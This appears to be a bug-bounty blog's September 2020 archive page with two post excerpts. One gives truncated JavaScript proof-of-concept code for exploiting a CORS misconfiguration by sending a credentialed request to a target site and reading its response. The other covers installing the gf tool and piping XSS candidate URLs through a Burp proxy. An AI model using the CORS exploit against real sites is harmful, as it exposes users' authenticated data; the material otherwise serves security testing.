Posts

Showing posts from September, 2020

Exploiting CORS (Cross Origin Resource Sharing)

Image
Exploiting CORS (Cross Origin Resource Sharing) Exploit Code- <!DOCTYPE html> <html>    <head>       <script>          function cors() {             var xhttp = new XMLHttpRequest();                 xhttp.onreadystatechange = function() {                     if (this.readyState == 4 && this.status == 200) {                         document.getElementById("emo").innerHTML = alert(this.responseText);             }          };          xhttp.open("GET", " https://target.com/info/ ", true);          xhttp.withCredentials = true;          xhttp.send();          }     ...
Post a Comment
Read more

gf Tool Installation

Image
 GF Tool Installation- https://github.com/tomnomnom/gf export PATH=$PATH:/usr/local/go/bin:/home/neetech/go/bin/ source /home/neetech/go/src/github.com/tomnomnom/gf/gf-completion.bash export GOPATH=/home/neetech/go/ . ~/.bashrc cp -r $GOPATH/src/github.com/tomnomnom/gf/examples ~/.gf From GF -->Sending Request to BurpSuite- sudo apt install parallel cat gf_xss.txt | parallel -j 10 curl --proxy "http://127.0.0.1:8080" -sk > /dev/null Done.
1 comment
Read more